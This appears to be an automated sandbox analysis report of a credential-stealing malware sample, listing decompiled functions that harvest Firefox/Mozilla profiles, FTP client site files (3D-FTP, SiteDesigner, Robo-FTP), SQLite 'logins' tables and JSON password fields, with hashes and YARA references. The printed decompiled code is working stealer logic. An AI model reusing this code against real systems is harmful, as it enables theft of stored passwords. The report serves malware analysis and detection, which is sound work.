API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
API String ID: 1852535927-1100116640
Opcode ID: 4b80c48c8f5c6b84af181e8d95d47abb8a1bb5b393dc5a666caa3c1ef2c42a52
Instruction ID: 0e75cfa17dfb2f7b8333cb936f596bb44a555b5fa009e7f621812bee52e14eac
Opcode Fuzzy Hash: 4b80c48c8f5c6b84af181e8d95d47abb8a1bb5b393dc5a666caa3c1ef2c42a52
Instruction Fuzzy Hash: 9C113CA690419D7DCB61E2F64D06DFFBAFC590C605B1400A7B6A0E20C2E67D97409B38

Uniqueness

Uniqueness Score: -1.00%

Function 00409996, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409996(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t17;
				void* _t18;
				void* _t19;

				_t19 = __eflags;
				_t18 = __edx;
				_t17 = __ecx;
				_v8 = E0040150D(_a4, 0x24, 0);
				 *0x415824 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Firefox", "\\Mozilla\\Firefox\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t18, _t19, _a4, _v8);
			}

0x00409996
0x00409996
0x00409996
0x004099ab
0x004099ae
0x004099c4
0x004099e1
0x004099fd
0x00409a09
0x00409a1a

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004099C4

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409A09

Strings

Firefox, xrefs: 004099CE, 004099EB
Software\Mozilla, xrefs: 004099D3, 004099F0
\Mozilla\Firefox\, xrefs: 004099C9, 004099E6

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\
API String ID: 3062143572-2631691096
Opcode ID: be824a605328de8f771db5039d6aa351b88e09572b38e9bb7d2f3b4bf0ba3e20
Instruction ID: ee68b02c4fe34adabb2d5b7da2459322c65d04647a6db10db078e7f2ecd853e2
Opcode Fuzzy Hash: be824a605328de8f771db5039d6aa351b88e09572b38e9bb7d2f3b4bf0ba3e20
Instruction Fuzzy Hash: 96F01231540608FEDF11BF91CC47FC93B659B84748F108076B609B51E2E7B95AE09A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00409BE1, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409BE1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t17;
				void* _t18;
				void* _t19;

				_t19 = __eflags;
				_t18 = __edx;
				_t17 = __ecx;
				_v8 = E0040150D(_a4, 0x28, 0);
				 *0x415824 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E0040988E(_t17, _a4,  *0x4140fe, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\");
				E0040988E(_t17, _a4, 0x80000002, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
				SetCurrentDirectoryA( &_v269);
				return E00401553(_t18, _t19, _a4, _v8);
			}

0x00409be1
0x00409be1
0x00409be1
0x00409bf6
0x00409bf9
0x00409c0f
0x00409c2c
0x00409c48
0x00409c54
0x00409c65

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409C0F

Part of subcall function 0040988E: StrStrIA.SHLWAPI(?,?), ref: 0040989A
Part of subcall function 0040988E: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409911
Part of subcall function 0040988E: RegEnumKeyExA.ADVAPI32 ref: 0040993D
Part of subcall function 0040988E: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409985

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409C54

Strings

Software\Mozilla, xrefs: 00409C1E, 00409C3B
\Mozilla\Profiles\, xrefs: 00409C14, 00409C31
Mozilla, xrefs: 00409C19, 00409C36

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
API String ID: 3062143572-2716603926
Opcode ID: 1779ce4a3d06fe848c2ece47419dc04276180907ba81840e26580dad2bf40cf0
Instruction ID: bbdd13b51472c6f4fc299ffa726447a69ce41118111f745e7b4f7d92f38d9e6c
Opcode Fuzzy Hash: 1779ce4a3d06fe848c2ece47419dc04276180907ba81840e26580dad2bf40cf0
Instruction Fuzzy Hash: 5AF0627055060CFADB51BFA1CD03FC93A659B94784F108036B604741F2DAB94AD09B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CABE, Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040CABE(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t10;
				void* _t12;
				char* _t20;
				void* _t29;
				char* _t30;

				_t29 = __edx;
				_v8 = E0040150D(_a4, 0x42, 0);
				_t30 =  *0x414082; // 0x0
				if( *_t30 == 0) {
					L5:
					_t10 = E00401DCE(_t34, 0x23);
					_t35 = _t10;
					if(_t10 != 0) {
						E00404131(_a4, E00401D69(_t10, "\\3D-FTP"), "sites.ini", 0xbeef0000); // executed
						E004017D5(_t17);
					}
					_t12 = E00401DCE(_t35, 0x23);
					_t36 = _t12;
					if(_t12 != 0) {
						E00404131(_a4, E00401D69(_t12, "\\SiteDesigner"), "sites.ini", 0xbeef0000); // executed
						E004017D5(_t14);
					}
					return E00401553(_t29, _t36, _a4, _v8);
				} else {
					goto L1;
				}
				do {
					L1:
					_t20 = StrStrIA(_t30, "3D-FTP");
					_t32 = _t20;
					if(_t20 != 0) {
						_t24 = E0040234A(_t32, _t30);
						if(E0040234A(_t32, _t30) != 0) {
							E00404131(_a4, _t24, "sites.ini", 0xbeef0000);
							E004017D5(_t24);
						}
					}
					asm("cld");
					asm("repne scasb");
					_t34 =  *_t30;
				} while ( *_t30 != 0);
				goto L5;
			}

APIs

StrStrIA.SHLWAPI(00000000,3D-FTP), ref: 0040CAE5

Part of subcall function 0040234A: lstrlenA.KERNEL32(?,?,00000000), ref: 0040235E
Part of subcall function 0040234A: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 0040237D
Part of subcall function 0040234A: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040238F
Part of subcall function 0040234A: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023A1

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

\SiteDesigner, xrefs: 0040CB59
\3D-FTP, xrefs: 0040CB2A
3D-FTP, xrefs: 0040CADF
sites.ini, xrefs: 0040CAFE, 0040CB3B, 0040CB6A

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
API String ID: 1884169789-4074339522
Opcode ID: c9b8f1d61c08507654c7ee15008012c1ec90163745007ea418106a44f27ae4f0
Instruction ID: c21e1b23b53f1c1b31708c1f6647b193aba12693f6123f211595877f46f97cb5
Opcode Fuzzy Hash: c9b8f1d61c08507654c7ee15008012c1ec90163745007ea418106a44f27ae4f0
Instruction Fuzzy Hash: 2711C1B0A40205B9EB1137769C47FAF397E4F80754F24013B7951B55E2DA7CAE8086AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB27, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AB27(intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				char _v2068;
				char _v2072;
				intOrPtr _v2076;
				long _t36;
				long _t37;

				_t36 = RegOpenKeyA( *0x4140fe, _a8,  &_v8); // executed
				_t37 = _t36;
				if(_t37 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2076 = E00401D15(E00401D15(_a8, "\\"),  &_v2068);
						E004017D5(_t42);
						_v2072 = E00401C8E( *0x4140fe, _v2076, "SiteServers",  &_v20);
						__eflags = _v2072;
						if(_v2072 == 0) {
							L12:
							E004017D5(_v2072);
							E0040AB27(_a4, _v2076);
							E004017D5(_v2076);
							_v12 = _v12 + 1;
							continue;
						}
						__eflags = _v20 - 4;
						if(_v20 != 4) {
							L11:
							E004017D5(_v2072);
							goto L12;
						}
						 *_t18 =  *_v2072;
						__eflags = _v2072 - 0x3e8;
						if(_v2072 > 0x3e8) {
							_v2072 = 0x3e8;
						}
						while(1) {
							__eflags = _v2072;
							if(_v2072 == 0) {
								goto L11;
							}
							_t21 =  &_v2072;
							 *_t21 = _v2072 - 1;
							__eflags =  *_t21;
							E0040A88E( *_t21, _a4, _v2076, _v2072);
						}
						goto L11;
					}
					return RegCloseKey(_v8);
				}
				return _t37;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040AB3D
RegEnumKeyExA.ADVAPI32 ref: 0040AB71
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040AC59

Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A8FA
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A90D
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A920
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A933
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A946
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A959
Part of subcall function 0040A88E: wsprintfA.USER32 ref: 0040A96C

Strings

SiteServers, xrefs: 0040ABAB

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wsprintf$CloseEnumOpen
String ID: SiteServers
API String ID: 1693054222-2402683488
Opcode ID: 9899356654b6a9245afdb474d23156e5eedd5c6f695110d3672d7baa3a92c592
Instruction ID: 47a2a2c135a91701639e8d1277b6cd8de78c57ea59644ea58835ceb1dfa6f9dd
Opcode Fuzzy Hash: 9899356654b6a9245afdb474d23156e5eedd5c6f695110d3672d7baa3a92c592
Instruction Fuzzy Hash: E831FA7190021CEBDF21AB91CC42BDDBAB9BF04304F14C0B6A244711A1DF795AE29F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00408B58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408B58(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				long _t28;
				long _t29;

				_t28 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t29 = _t28;
				if(_t29 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						if(RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0) != 0) {
							break;
						}
						_v2068 = E00401D15(E00401D15(_a12, "\\"),  &_v2064);
						E004017D5(_t34);
						_v2072 = E00401C8E(_a8, _v2068, "MRU", 0);
						if(_v2072 != 0) {
							E00403E23(_a4, _v2072, 0xbeef0001);
						}
						E004017D5(_v2072);
						E00408B58(_a4, _a8, _v2068);
						E004017D5(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t29;
			}

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408B6B
RegEnumKeyExA.ADVAPI32 ref: 00408B9F
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C3E

Strings

MRU, xrefs: 00408BD7

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: MRU
API String ID: 1332880857-344939820
Opcode ID: 04955c50c1872373deb9a7e0ee0220a1d1a9cbab5f9ec1d311523668c006d258
Instruction ID: dcb6cee7c3816d4270223188b258d8c916240f5df257d018843d2a4017f96bff
Opcode Fuzzy Hash: 04955c50c1872373deb9a7e0ee0220a1d1a9cbab5f9ec1d311523668c006d258
Instruction Fuzzy Hash: C321277190010CBADF21AFA1CD02FDD7BB9BF04304F1080BAB655B51A1DFB99A919F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC01, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040BC01(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				CHAR* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				char _v28;
				int _t35;
				void* _t52;

				if(_a16 == 5) {
					_t35 = E0040B1AB(_a12, 2,  &_v8,  &_v12,  &_v16);
					if(_v12 == 1) {
						_push(_v16);
						_pop( *_t8);
						_t35 = lstrcmpiA(_v20, "logins");
						if(_t35 == 0) {
							_t35 = E0040B1AB(_a12, 0,  &_v8,  &_v12,  &_v16);
							if(_v12 == 1) {
								_t35 = lstrcmpA("table", _v16);
								if(_t35 == 0) {
									_t35 = E0040B1AB(_a12, 3,  &_v8,  &_v12,  &_v16);
									if(_v12 == 0) {
										 *_t22 =  *_v16;
										_t35 = E0040B1AB(_a12, 4,  &_v8,  &_v12,  &_v16);
										if(_v12 == 1) {
											 *0x41914c = 0xffffffff;
											 *0x419150 = 0xffffffff;
											 *0x419154 = 0xffffffff;
											_t35 = E0040B69A(_v16, E0040B973);
											_v28 = 1;
											if( *0x41914c != 0xffffffff &&  *0x419150 != 0xffffffff &&  *0x419154 != 0xffffffff) {
												_t52 = E0040B38F(_a4, _a8, _v24,  &_v28, _a20, E0040BA2E); // executed
												return _t52;
											}
										}
									}
								}
							}
						}
					}
				}
				return _t35;
			}

APIs

lstrcmpiA.KERNEL32(00000000,logins,?), ref: 0040BC3F
lstrcmpA.KERNEL32(table,?,00000000,logins,?), ref: 0040BC74

Part of subcall function 0040B69A: StrStrIA.SHLWAPI(?,() ), ref: 0040B6AA

Strings

logins, xrefs: 0040BC37
table, xrefs: 0040BC6F

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmplstrcmpi
String ID: logins$table
API String ID: 3524194181-3800951466
Opcode ID: 8d40306bce2371030e01591ff81e34dc71d5cc82bd418bb0d145ecbc17cbc88a
Instruction ID: 24804250fb1ea017375bfa21efe0a860dce1abc885f05977de560fb28726df4f
Opcode Fuzzy Hash: 8d40306bce2371030e01591ff81e34dc71d5cc82bd418bb0d145ecbc17cbc88a
Instruction Fuzzy Hash: 2A31467281024EFAEF219FD0CC45EEEBB78EF15324F104276E520B11E1D3789A949B88

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAA, Relevance: 6.1, APIs: 4, Instructions: 87
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401BAA(void* _a4, char* _a8, char* _a12, int** _a16, intOrPtr _a20) {
				void* _v8;
				int _v12;
				int _v16;
				int** _t28;
				long _t30;
				char* _t33;
				void* _t36;
				long _t39;
				long _t46;
				signed int _t51;
				char* _t53;

				_t28 = _a16;
				if(_t28 != 0) {
					 *_t28 = 0;
				}
				_t53 = 0;
				if(_a20 != 1) {
					if(_a20 != 2) {
						_t51 = 0;
					} else {
						_t51 = 0x100;
					}
				} else {
					_t51 = 0x200;
				}
				_t30 = RegOpenKeyExA(_a4, _a8, 0, _t51 | 0x00020019,  &_v8); // executed
				if(_t30 == 0) {
					_t39 = RegQueryValueExA(_v8, _a12, 0,  &_v16, 0,  &_v12); // executed
					if(_t39 == 0 && _v12 != 0 && (_v16 != 1 || _v12 != 1)) {
						_t53 = E004017EC(_v12 + 1);
						_t46 = RegQueryValueExA(_v8, _a12, 0, 0, _t53,  &_v12); // executed
						if(_t46 == 0) {
							if(_a16 != 0) {
								_push(_v12);
								_pop( *__eax);
							}
						} else {
							E004017D5(_t53);
							_t53 = 0;
						}
					}
					RegCloseKey(_v8); // executed
				}
				_t33 = _t53;
				if(_t33 != 0 || _a20 >= 2) {
					return _t33;
				} else {
					_t36 = E00401BAA(_a4, _a8, _a12, _a16, _a20 + 1); // executed
					return _t36;
				}
			}

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401BEF
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401C0A
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401C40
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401C62

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: b810f69a1d6a23f16d29d2ab89dbb07472514c7d9c2ca456eecb5a00040119ad
Instruction ID: 6d9cc93ce3cdeedd4ff0784c2595653c4496094a9b1daf344de8f42f3f4a3d5e
Opcode Fuzzy Hash: b810f69a1d6a23f16d29d2ab89dbb07472514c7d9c2ca456eecb5a00040119ad
Instruction Fuzzy Hash: B5217132600108FFEF119E90CD42BEE3BBAEB40344F10403AF511A61B1E779DA91DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00406DE7, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406DE7(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				char* _v28;
				void* _t19;
				void* _t20;
				intOrPtr* _t23;
				intOrPtr* _t27;
				intOrPtr* _t30;
				char* _t32;
				void* _t38;
				char _t40;
				char* _t41;

				_t38 = __ecx;
				_t19 = E00401E53(_a8); // executed
				_t20 = _t19;
				if(_t20 != 0) {
					_t23 = E00401F1B(__eflags, _a8,  &_v20);
					__eflags = _t23;
					if(_t23 != 0) {
						_v24 = E004017EC(_v8);
						E00401823(_v12, _v24, _v8);
						_t41 = _v24;
						while(1) {
							__eflags =  *_t41;
							if( *_t41 == 0) {
								break;
							}
							_t27 = StrStrIA(_t41, "\"password\" : \"");
							__eflags = _t27;
							if(_t27 != 0) {
								_t41 = _t27 + lstrlenA("\"password\" : \"");
								_v28 = _t41;
								_t30 = StrStrIA(_t41, "\",");
								__eflags = _t30;
								if(__eflags != 0) {
									 *_t30 = 0;
									_push( *_t30);
									E00406D6F(_t38, __eflags, _a4, _v28);
									_pop(_t40);
									_t32 = _t30;
									 *_t32 = _t40;
									continue;
								}
								break;
							}
							break;
						}
						E00401486(_a4, 0xbeef1001);
						E004014BC(_a4, _v24, _v8);
						E004017D5(_v24);
						return E00401FB0( &_v20);
					}
					return _t23;
				} else {
					return _t20;
				}
			}

Strings

"password" : ", xrefs: 00406E31, 00406E44

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "password" : "
API String ID: 0-2310853927
Opcode ID: 5b68fb03cdf083ea57db854297a0cadf2f38fa05e3e79aaf6980040a0e154af2
Instruction ID: 9cc4e85d6de1a42ee7ad07191c646accbbd50fe48afa7da354d9bcd9ed2f16a6
Opcode Fuzzy Hash: 5b68fb03cdf083ea57db854297a0cadf2f38fa05e3e79aaf6980040a0e154af2
Instruction Fuzzy Hash: 4D218136800209BECF12ABA1CC02EEE7E75AF60354F154177F802B51B1D77D4E619B99

Uniqueness

Uniqueness Score: -1.00%

Function 004011D5, Relevance: 6.0, APIs: 4, Instructions: 46
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004011D5(signed int __eax, signed int __edx, CHAR* _a4, intOrPtr _a8) {
				void* _v8;
				long _v12;
				void _v4108;
				void* _t14;
				void* _t15;
				int _t18;
				signed int _t28;

				_t28 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_t14 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0, 0); // executed
				_v8 = _t14;
				_t15 = _t14 + 1;
				if(_t15 != 0) {
					while(1) {
						_t18 = ReadFile(_v8,  &_v4108, 0x1000,  &_v12, 0); // executed
						if(_t18 == 0) {
							break;
						}
						E0040115C( &_v4108, _t28, _a8,  &_v4108, _v12); // executed
						if(_v12 != 0) {
							continue;
						} else {
							CloseHandle(_v8);
							return 1;
						}
						goto L6;
					}
					CloseHandle(_v8);
					return 0;
				} else {
					return _t15;
				}
				L6:
			}

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000,00000000,00000000,?,?,?,00000000), ref: 004011F6
ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000,00000000), ref: 0040121A
CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,?,004027C1,00000000), ref: 00401226

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleRead
String ID:
API String ID: 1035965006-0
Opcode ID: 3ae2a460d1a6398647d0a0714ade2b014be269c296f1c7f65f76ee4d7157fb81
Instruction ID: d891ca6dc5143c7d33845585369107a0d95fb6be188be00085997746f24086b0
Opcode Fuzzy Hash: 3ae2a460d1a6398647d0a0714ade2b014be269c296f1c7f65f76ee4d7157fb81
Instruction Fuzzy Hash: C2018131A40108BAEF22EA61CC03FDE7679AB14349F1081B6B540F50E1F6F89BD49B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D330, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040D330(intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				char _v32;
				intOrPtr* _t16;
				intOrPtr* _t17;
				void* _t22;
				void* _t26;

				_t16 = E00401C8E(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts", "FTP Count",  &_v8); // executed
				_t17 = _t16;
				if(_t17 != 0) {
					_push(_t17);
					if(_v8 != 4) {
						L9:
						return E004017D5();
					}
					 *_t4 =  *_t17;
					if(_v12 > 0x1f4) {
						_v12 = 0x1f4;
					}
					while(_v12 != 0) {
						wsprintfA( &_v32, "FTP File%d", _v12);
						_t26 = _t26 + 0xc;
						_t22 = E00401C8E(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts",  &_v32, 0);
						_t23 = _t22;
						if(_t22 != 0) {
							E00403E4C(_a4, _t23, 0xbeef0001);
							E004017D5(_t23);
						}
						_v12 = _v12 - 1;
					}
					goto L9;
				}
				return _t17;
			}

APIs

wsprintfA.USER32 ref: 0040D37A

Part of subcall function 004017D5: LocalFree.KERNEL32(00000000,?,00402BF8), ref: 004017E1

Strings

FTP Count, xrefs: 0040D33A
FTP File%d, xrefs: 0040D371
SOFTWARE\Robo-FTP 3.7\Scripts, xrefs: 0040D33F, 0040D388

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
API String ID: 988369812-376751567
Opcode ID: 632a32571c90a33c2eca92b55cf26a6d800d2a0c6ce34a5ca6cd22ada843cffb
Instruction ID: 20435d818a537ba36105be44c8c75927b15d0ac77e29042cca7cc8f591fb12c9
Opcode Fuzzy Hash: 632a32571c90a33c2eca92b55cf26a6d800d2a0c6ce34a5ca6cd22ada843cffb
Instruction Fuzzy Hash: 1B017C75E40108FEEF00ABD0CC42EEEBA79AB00314F108037B810B21D1D77D8A999A5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401D15, Relevance: 6.0, APIs: 4, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D15(CHAR* _a4, CHAR* _a8) {
				int _t9;
				CHAR* _t11;
				CHAR* _t18;

				if(_a4 == 0) {
					_a4 = 0x4140dc;
				}
				if(_a8 == 0) {
					_a8 = 0x4140dc;
				}
				_t9 = lstrlenA(_a4);
				_t11 = E004017EC(_t9 + lstrlenA(_a8) + 1); // executed
				_t18 = _t11;
				lstrcpyA(_t18, _a4);
				lstrcatA(_t18, _a8);
				return _t18;
			}

0x00401d1d
0x00401d1f
0x00401d1f
0x00401d2a
0x00401d2c
0x00401d2c
0x00401d36
0x00401d49
0x00401d4e
0x00401d54
0x00401d5d
0x00401d66

APIs

lstrlenA.KERNEL32(?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D36
lstrlenA.KERNEL32(?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401D40
lstrcpyA.KERNEL32(00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF,00000000,00000000), ref: 00401D54
lstrcatA.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,004020A1,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,004140DA,00410BE4,00000000,?,00000FFF), ref: 00401D5D

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID:
API String ID: 2414487701-0
Opcode ID: ed04cc0a6ecd02db3481c5f24da25771bf7219ba3f246894e7468dd910f212c0
Instruction ID: b07956f7e4c4c3b071cedfc2c00158bbb0f467af7b0f96d575d83a1108638678
Opcode Fuzzy Hash: ed04cc0a6ecd02db3481c5f24da25771bf7219ba3f246894e7468dd910f212c0
Instruction Fuzzy Hash: 23F03075100208BFDF012FA2DC81ADE3B98AF1435CF00D52AB9151A252E7BDC9D48F98

Uniqueness

Uniqueness Score: -1.00%

Function 00410B60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
comCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00410B60(signed int __eax, void* __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _t8;
				void* _t9;
				int _t13;
				signed int _t24;

				_t24 = __edx ^ __eax ^ __eax ^ __edx ^ __eax;
				_push(0); // executed
				L00410DD6(); // executed
				_t8 = E00402AF8(E00410331(E0040244F(), _t24), _t24); // executed
				_t9 = E00402B27(_t8, _t24); // executed
				_t10 = _t9;
				if(_t9 != 0 && E00402C05(_t10, _t24, _a4) != 0) {
					 *0x414616 = 1;
				}
				 *0x417695 = E004017EC(0x101);
				_v8 = 0x101;
				_t13 = GetUserNameA( *0x417695,  &_v8); // executed
				if(_t13 == 0) {
					E004017D5( *0x417695);
					 *0x417695 = 0; // executed
				}
				E00401FD8(_t24); // executed
				return E0041038A(E00401CBA(), _t24, "Oguqcogtkec");
			}

0x00410b6a
0x00410b6c
0x00410b6e
0x00410b7d
0x00410b82
0x00410b87
0x00410b89
0x00410b97
0x00410b97
0x00410bab
0x00410bb0
0x00410bc1
0x00410bc8
0x00410bd0
0x00410bd5
0x00410bd5
0x00410bdf
0x00410bf4

APIs

OleInitialize.OLE32(00000000), ref: 00410B6E
GetUserNameA.ADVAPI32(00000101,00000101), ref: 00410BC1

Strings

Oguqcogtkec, xrefs: 00410BE9

Memory Dump Source

Source File: 0000000C.00000001.689692906.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InitializeNameUser
String ID: Oguqcogtkec
API String ID: 2272643758-3284314360
Opcode ID: fca58cfdc3c7b01d0fe083cd0c9ee51238c257130a43fea9f7abb90a3e26fcd1
Instruction ID: 4cd0992862414466d0513175d6398bc8650a8c005d487a3a8098377ca90b23e8
